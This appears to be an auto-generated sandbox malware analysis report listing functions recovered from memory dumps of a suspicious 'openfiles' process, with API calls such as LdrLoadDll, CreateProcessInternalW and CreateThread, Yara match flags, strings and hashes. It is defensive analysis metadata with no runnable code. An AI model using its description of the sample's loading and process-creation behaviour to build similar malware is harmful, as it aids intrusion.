                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 7c34f1c3ee2fed31728eacbb08373cb9082c62116cd3477ffcf8b7a791a60a05
                            • Instruction ID: 6212e4f62a961e0a42a246c44f8d11beacf3b783b5da3abd383846ecd88ea469
                            • Opcode Fuzzy Hash: 7c34f1c3ee2fed31728eacbb08373cb9082c62116cd3477ffcf8b7a791a60a05
                            • Instruction Fuzzy Hash: 98900229212410072105B558070450701568BD5355355C521F211A550CD621D9A55122
                            Function 048C2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: bab171294cd13dc629f063fd046348c798368d7beaa35b6bd57dab21d6e3b330
                            • Instruction ID: bbbd3ad53754f088e4c4eabaf061e123e6e7928c55937be302947b90c284193c
                            • Opcode Fuzzy Hash: bab171294cd13dc629f063fd046348c798368d7beaa35b6bd57dab21d6e3b330
                            • Instruction Fuzzy Hash: 7F900229222410062145B558060450B05559BD6355395C515F251B590CC621D9A95322
                            Function 048C2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 0e7b016d3a5637acc886d4326a7118811c8d88397da26377fdd036adc6e72e48
                            • Instruction ID: d811c7937b563f3fbab451628b658de5f024438a3106290783e45b367a5ce2c4
                            • Opcode Fuzzy Hash: 0e7b016d3a5637acc886d4326a7118811c8d88397da26377fdd036adc6e72e48
                            • Instruction Fuzzy Hash: 7D90023560641806F1507158441474601158BD0305F55C511A1129654D8755DB9976A2
                            Function 048C2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 364ac2cea10cd833c6e690758abb0e1c8f81f7d6f434ac92670f8988ebdfd72f
                            • Instruction ID: 0340f4ac0aad147c4fd9d5278b4a6600721a641aae3514ec10de2abc2ae401d1
                            • Opcode Fuzzy Hash: 364ac2cea10cd833c6e690758abb0e1c8f81f7d6f434ac92670f8988ebdfd72f
                            • Instruction Fuzzy Hash: 4A90023520645846F14071584404A4601258BD0309F55C511A1169694D9625DE99B662
                            Function 048C2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 25ce52d59ad0b0a8aef2274fdb8fa310db2f25f0d43c37084b69360d653d97a4
                            • Instruction ID: 170f0701720591c643ef5c016a8302a8800fc284dd950022c9db091d4e538c62
                            • Opcode Fuzzy Hash: 25ce52d59ad0b0a8aef2274fdb8fa310db2f25f0d43c37084b69360d653d97a4
                            • Instruction Fuzzy Hash: C090023520241806F1807158440464A01158BD1305F95C515A112A654DCA15DB9D77A2
                            Function 048C2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: e5f4f3ef8e6d7b10cc3a311755431017c56a388d2c2a64d7f571992bdf163c1c
                            • Instruction ID: d7399a82b47a5b5cc70948eb1a7d5c434496d813cd35a7441c750caeafd48101
                            • Opcode Fuzzy Hash: e5f4f3ef8e6d7b10cc3a311755431017c56a388d2c2a64d7f571992bdf163c1c
                            • Instruction Fuzzy Hash: 9590026520341007610571584414616411A8BE0205B55C521E2119590DC525D9D56126
                            Function 048C35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 97dd95e60a99a79f25f8cab2209779bcc3d2b2d288e357bb8f97f4b6d3d20669
                            • Instruction ID: 7feeccf3c5fd32ff3719cfbcd07e506eb6177d7191d69fefd5f80f4b1a95743c
                            • Opcode Fuzzy Hash: 97dd95e60a99a79f25f8cab2209779bcc3d2b2d288e357bb8f97f4b6d3d20669
                            • Instruction Fuzzy Hash: 5E90023560651406F1007158451470611158BD0205F65C911A1529568D8795DA9565A3
                            Function 048C39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 63457b5b7a3c8304c4051b11d2cb9f8c015ebcd8e5c35a6580d62e902860f406
                            • Instruction ID: e6d87f79c9c7b9f6daca6888fb4c78c4ef04021541c714c3e0803fd4cd8d5438
                            • Opcode Fuzzy Hash: 63457b5b7a3c8304c4051b11d2cb9f8c015ebcd8e5c35a6580d62e902860f406
                            • Instruction Fuzzy Hash: 0890022524646106F150715C44046164115ABE0205F55C521A1919594D8555D9996222
                            Function 028325B0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 103sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNELBASE(000007D0), ref: 0283266C
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: net.dll$wininet.dll
                            • API String ID: 3472027048-1269752229
                            • Opcode ID: 09580abe566dab4afbaeab966b2fa8750595c679cf4a3c59ac5f8cca787bbd6f
                            • Instruction ID: 28cc3ca7b8162de653e2084b4d6fffb897196542cca9861a3da2b536449d2e29
                            • Opcode Fuzzy Hash: 09580abe566dab4afbaeab966b2fa8750595c679cf4a3c59ac5f8cca787bbd6f
                            • Instruction Fuzzy Hash: 693190B9601704BBC714DF64D880FE7BBA9BF48704F00851DAA59AB245D7B0BA44CBA5
                            Function 0282E629 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 104COMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 0282E647
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: Initialize
                            • String ID: @J7<
                            • API String ID: 2538663250-2016760708
                            • Opcode ID: f398f27882ab8574199e5b7648be66e2e623f0696a8961807de153c448ae568a
                            • Instruction ID: b3705bc449fb68d6a47640dcde10fa4373fdd613ad9c083b9a79322345c90311
                            • Opcode Fuzzy Hash: f398f27882ab8574199e5b7648be66e2e623f0696a8961807de153c448ae568a
                            • Instruction Fuzzy Hash: 123121B9A00609AFDB00DFD8D8809EFB7B9BF88304B108559E505EB254D775FE45CBA1
                            Function 0282E630 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 0282E647
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: Initialize
                            • String ID: @J7<
                            • API String ID: 2538663250-2016760708
                            • Opcode ID: 472226886c7460e8f4e303ef82d2f4c532d7dbe92ca990ad27249e01b7d90a3b
                            • Instruction ID: b42a128f624197b7a31b1c48f7139937c638e9b2ef55faa1f8ba59c342d6f851
                            • Opcode Fuzzy Hash: 472226886c7460e8f4e303ef82d2f4c532d7dbe92ca990ad27249e01b7d90a3b
                            • Instruction Fuzzy Hash: 7F3130B9A0020A9FDB00DFD8D8809EFB7B9BF88304B108559E605EB214D775FE45CBA1
                            Function 028277E0 Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                            Download Yara Rule
                            APIs
                            • GetFileAttributesW.KERNELBASE(?), ref: 028277BC
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: adb0fcfa9412e521eb2db6495ec5f0e6dac01e5c3be4736d41f651ef50f3307c
                            • Instruction ID: 1d82f4b3f68e7163e8e368ca01ea3acd624c932c0c57b0f088998fcc755e4de6
                            • Opcode Fuzzy Hash: adb0fcfa9412e521eb2db6495ec5f0e6dac01e5c3be4736d41f651ef50f3307c
                            • Instruction Fuzzy Hash: F7410E7D4083E29BC716CB3A8885699BFA5EF83224B1806D9D5D4CB287CB11D58EC7C2
                            Function 02823E40 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02823EB2
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: 3cbafcbb204b78bcf82abb4cf732ec46d42f0b04ed4e9d16c39dafc5bdaef8ad
                            • Instruction ID: 68ce276d4a0de141e8e3b279ed42d8464c6727b7ab9d334b14ebb323b436a988
                            • Opcode Fuzzy Hash: 3cbafcbb204b78bcf82abb4cf732ec46d42f0b04ed4e9d16c39dafc5bdaef8ad
                            • Instruction Fuzzy Hash: 50011EBED0020DABDF15DAE4DC41F9EB7799B54308F004195E908D7640F675E7588B92
                            Function 02837DE0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateProcessInternalW.KERNELBASE(02820911,02820939,02820711,00000000,02827753,00000010,02820939,?,?,00000044,02820939,00000010,02827753,00000000,02820711,02820939), ref: 02837E43
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateInternalProcess
                            • String ID:
                            • API String ID: 2186235152-0
                            • Opcode ID: 043c08d0a8dd2b1e71f0431f4605235f5855b0922071984581f1b3c8e30ec818
                            • Instruction ID: ac98ec19695ae750221410a4a848e64442d3365c9812a65a3704bf75c101008d
                            • Opcode Fuzzy Hash: 043c08d0a8dd2b1e71f0431f4605235f5855b0922071984581f1b3c8e30ec818
                            • Instruction Fuzzy Hash: 5B01C4B6201108BFCB44DF89DC81EDB77AEAF8C754F408108FA09E3240D630F8518BA5
                            Function 02823E33 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02823EB2
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: 51f215d03ed2bb803e83f769321a4cef7c327660d9c7137f1af0a5ac968b8416
                            • Instruction ID: 95f88f18ae6d57a857fe1683e0d78d805111ab6e0e00525d622b6e5212ff2071
                            • Opcode Fuzzy Hash: 51f215d03ed2bb803e83f769321a4cef7c327660d9c7137f1af0a5ac968b8416
                            • Instruction Fuzzy Hash: 780184BED0010DABDF01DA94D841F9DB7759B44308F004194ED08DB640F630E758CBD2
                            Function 02819450 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                            Download Yara Rule
                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02819495
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: 20ed8083e4787303f119af43beaf8c17ad51edda7b5543096eb949664cc9c46f
                            • Instruction ID: f2d15d4364d2317c1e138987537c94f3a4b4512c1f530d983d4973b7887cda04
                            • Opcode Fuzzy Hash: 20ed8083e4787303f119af43beaf8c17ad51edda7b5543096eb949664cc9c46f
                            • Instruction Fuzzy Hash: 60F06DBB3802083AE63061AD9C02FDBB39D9B81B75F544429F74CEB1C0D996B40186EA
                            Function 02837D00 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(02821079,?,02834917,02821079,028340B7,02834917,?,02821079,028340B7,00001000,?,?,028395C0), ref: 02837D3C
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 66be5ddc2b89073eb30e9d0bd3799b043242f50acd063acfbdbcd1ab245d0047
                            • Instruction ID: 9f9a7665a8f445259a640cd68c37b6fb2dd63cb2fa65909b704acd3c5d0ba87a
                            • Opcode Fuzzy Hash: 66be5ddc2b89073eb30e9d0bd3799b043242f50acd063acfbdbcd1ab245d0047
                            • Instruction Fuzzy Hash: DFE06D752002087BD614EE58DC41FDB37ADDFC8710F408019F909A7281C630B8118BB5
                            Function 02837D50 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F445C77A,00000007,00000000,00000004,00000000,0282371D,000000F4,?,?,?,?,?), ref: 02837D8C
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: b8acce31f274aa27ecedb377be3c6f3336657f9b78793ef0f07d4015a8d14003
                            • Instruction ID: 3bdca555e581ed8f1bd8e8e130c27439750d7f0ff57ad34b9d9678a39b055832
                            • Opcode Fuzzy Hash: b8acce31f274aa27ecedb377be3c6f3336657f9b78793ef0f07d4015a8d14003
                            • Instruction Fuzzy Hash: 68E06D752002087FC610EE59DC41FDB37ADEFC4714F508009FA09E7280C670B8118BB9
                            Function 02827790 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            • GetFileAttributesW.KERNELBASE(?), ref: 028277BC
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: c93e9127776158ae1028463cc49baa8b7566ea6632e9acd7b9f00b6ce0edb07e
                            • Instruction ID: a42ea3a96b5c37d98040ccb64816d216e97cd57670c4c818d7f64c1b0feca3fb
                            • Opcode Fuzzy Hash: c93e9127776158ae1028463cc49baa8b7566ea6632e9acd7b9f00b6ce0edb07e
                            • Instruction Fuzzy Hash: 47E0867D2402082FFB246ABDDC45F6633588B4CB38F684A68BD5CDB2C1E6B8F5458294
                            Function 02827597 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNELBASE(00008003,?,?,02821360,028367D7,028340B7,?), ref: 028275D3
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            • Opcode ID: 8e79f12e868922806e31f23d0f5317130339fc60e93918cb0dfb7d331b0e30ef
                            • Instruction ID: a8693d371dfe53e8e62858b6c8f8a97e49df6f44e91e481e4c0561b2d95a0bfa
                            • Opcode Fuzzy Hash: 8e79f12e868922806e31f23d0f5317130339fc60e93918cb0dfb7d331b0e30ef
                            • Instruction Fuzzy Hash: 26E0CDB969010536F640B6A58C06F55214F5790754F848438B60CE62C1DD55E1098595
                            Function 028204CB Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • PostThreadMessageW.USER32(?,00000111), ref: 028204D7
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID:
                            • API String ID: 1836367815-0
                            • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                            • Instruction ID: 93bd9195393dab7859fafbb26b0f0c5876d28f28cba64a276de66d8de4a1574a
                            • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                            • Instruction Fuzzy Hash: CFD0A96BB0001C3AAA125584ACC1DFEB72CEB84AAAF008063FB08E2040E62199060AB0
                            Function 028275A0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNELBASE(00008003,?,?,02821360,028367D7,028340B7,?), ref: 028275D3
                            Memory Dump Source
                            • Source File: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Offset: 02810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2810000_openfiles.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            • Opcode ID: 1b99050430cabb93b32b47a1f41b408ea2d6694c5e7dc4c407172783bd2aa50a
                            • Instruction ID: bb993d9cdaf4b3cb51674d0b4c5eaf7386333b55804ed42d07fc8a3bd69aeb0f
                            • Opcode Fuzzy Hash: 1b99050430cabb93b32b47a1f41b408ea2d6694c5e7dc4c407172783bd2aa50a
                            • Instruction Fuzzy Hash: 07D05EB97802083BF650A6A98C07F56728E5B50768F448478BA0CE72C2ED55F50086AA
                            Function 048C2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 3793aab6cfec5df40058fb3c456537cacd0168ee9f483d538e8b203fa757d494
                            • Instruction ID: 124d4d4f2c544f14e7bc49a7e7e1b0e377b8314701bcbc838e796d7a7bfe6089
                            • Opcode Fuzzy Hash: 3793aab6cfec5df40058fb3c456537cacd0168ee9f483d538e8b203fa757d494
                            • Instruction Fuzzy Hash: F4B09B75D025D5C9FB11F76046087177A106BD0705F15C565D3134645E4738D1D5E176

                            Non-executed Functions

                            Function 048C2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            • Opcode ID: bd6fd35c5f6961ac34381363b675b3d2323f6f1f443cae449685bb4c2847ff53
                            • Instruction ID: cae754c7c9dcba5d13dcad8f37362ea738f1e2cda4ba42302312fb12d40b9ba3
                            • Opcode Fuzzy Hash: bd6fd35c5f6961ac34381363b675b3d2323f6f1f443cae449685bb4c2847ff53
                            • Instruction Fuzzy Hash: 6451E9B5E0011ABFDB15DF988C9097EF7B8BB08204B148B6DE499D7685E274FE0497A0
                            Function 04932410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            • Opcode ID: 09a3a1c23dc474b540e46a7b60cb0636430378dbace6de2048da7a8e40da9991
                            • Instruction ID: 4c17ca23df7573f24e1242e1da5023c19cdd8d782b82b0d963c8a5dfb233971d
                            • Opcode Fuzzy Hash: 09a3a1c23dc474b540e46a7b60cb0636430378dbace6de2048da7a8e40da9991
                            • Instruction Fuzzy Hash: 41511371B00645AFDB20DF5CC89087FB7FDAB46206B0089B9E896D7641E6B4FA00DB61
                            Function 048B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                            Download Yara Rule
                            Strings
                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 048F4787
                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 048F4725
                            • ExecuteOptions, xrefs: 048F46A0
                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 048F46FC
                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 048F4655
                            • Execute=1, xrefs: 048F4713
                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 048F4742
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID:
